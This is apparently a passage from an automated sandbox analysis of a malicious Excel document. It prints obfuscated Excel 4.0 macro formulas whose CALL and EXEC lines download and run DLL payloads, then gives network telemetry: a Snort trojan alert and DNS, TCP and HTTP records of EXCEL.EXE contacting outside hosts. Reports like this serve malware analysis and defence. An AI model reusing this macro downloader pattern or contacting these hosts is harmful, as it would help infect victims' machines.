59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM23,before.2.0.0.sheet!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM24,before.2.0.0.sheet!AO15&""1""&"".dll"",0,0)",,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/07/21-09:15:05.069854 | TCP | 2009897 | ET TROJAN Possible Windows executable sent when remote host claims to send html content | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 09:15:00.919925928 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:00.938839912 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:00.938941002 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:00.939644098 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.000272989 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.327353001 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.327575922 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.327745914 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.345602989 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.642882109 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.661051989 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.661165953 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.662440062 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.720390081 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063385963 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063426018 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063682079 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:02.063886881 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:02.082295895 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.227967978 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.368988037 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.369075060 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.370420933 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.511811972 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.678519964 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.678713083 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.679001093 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.679055929 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:03.095360994 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.236845970 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:03.236989975 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.238714933 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.379930973 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.319272041 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.319385052 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:04.322556973 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.322618008 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:04.757160902 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:04.909230947 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:04.909307957 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:04.909897089 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.061911106 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069854021 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069907904 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069946051 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069962025 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.069993019 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069997072 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070035934 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070048094 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070066929 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070092916 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070121050 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070123911 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070166111 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070178032 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070204973 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070215940 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070241928 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070265055 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070295095 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.075287104 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222563028 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222589016 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222600937 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222616911 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222716093 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222773075 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222807884 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222825050 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222858906 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222881079 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222891092 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222898960 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222946882 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222951889 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222999096 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223002911 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223022938 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223031998 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223054886 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223071098 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223072052 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223112106 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223112106 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223133087 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223151922 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223151922 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223191023 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223208904 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223228931 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223232031 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223253012 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223280907 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223311901 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.225841045 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.228734970 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.376903057 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.376960993 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.376991987 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377037048 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377074003 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377099991 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377116919 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377140045 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377146006 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377156973 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377192974 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377194881 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377208948 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377233982 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377258062 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377274036 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377293110 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377321959 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377337933 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377366066 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377393007 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377424002 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377433062 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377471924 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377502918 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377510071 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377526999 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377547979 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377568007 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377587080 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377609015 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377624989 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377645969 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377671003 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377706051 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377718925 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377734900 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377762079 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377799034 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377799034 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377815962 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377839088 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377854109 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377876043 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377904892 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377918005 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377942085 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377957106 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377979040 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377981901 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.378006935 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.378032923 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.379688978 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.382715940 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:07.298922062 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:07.300324917 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:32.678744078 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:34.322877884 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:37.301975965 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 09:15:00.593981028 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:00.904869080 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:01.338613033 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:01.638679981 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:02.082560062 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:02.225878000 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:02.689320087 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:03.091237068 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:04.330058098 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:04.754915953 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 09:15:00.593981028 CEST | 192.168.2.22 | 8.8.8.8 | 0xfda2 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 7, 2021 09:15:01.338613033 CEST | 192.168.2.22 | 8.8.8.8 | 0x5115 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 7, 2021 09:15:02.082560062 CEST | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 7, 2021 09:15:02.689320087 CEST | 192.168.2.22 | 8.8.8.8 | 0x9610 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 7, 2021 09:15:04.330058098 CEST | 192.168.2.22 | 8.8.8.8 | 0xed69 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 09:15:00.904869080 CEST | 8.8.8.8 | 192.168.2.22 | 0xfda2 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 7, 2021 09:15:01.638679981 CEST | 8.8.8.8 | 192.168.2.22 | 0x5115 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 7, 2021 09:15:02.225878000 CEST | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | 192.185.56.250 | A (IP address) | IN (0x0001) | ||
Apr 7, 2021 09:15:03.091237068 CEST | 8.8.8.8 | 192.168.2.22 | 0x9610 | No error (0) | 103.211.216.55 | A (IP address) | IN (0x0001) | ||
Apr 7, 2021 09:15:04.754915953 CEST | 8.8.8.8 | 192.168.2.22 | 0xed69 | No error (0) | 111.118.215.222 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:00.939644098 CEST | 0 | OUT | |
Apr 7, 2021 09:15:01.327353001 CEST | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:01.662440062 CEST | 2 | OUT | |
Apr 7, 2021 09:15:02.063385963 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 192.185.56.250 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:02.370420933 CEST | 3 | OUT | |
Apr 7, 2021 09:15:02.678519964 CEST | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49170 | 103.211.216.55 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:03.238714933 CEST | 4 | OUT | |
Apr 7, 2021 09:15:04.319272041 CEST | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49171 | 111.118.215.222 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:04.909897089 CEST | 6 | OUT | |
Apr 7, 2021 09:15:05.069854021 CEST | 7 | IN |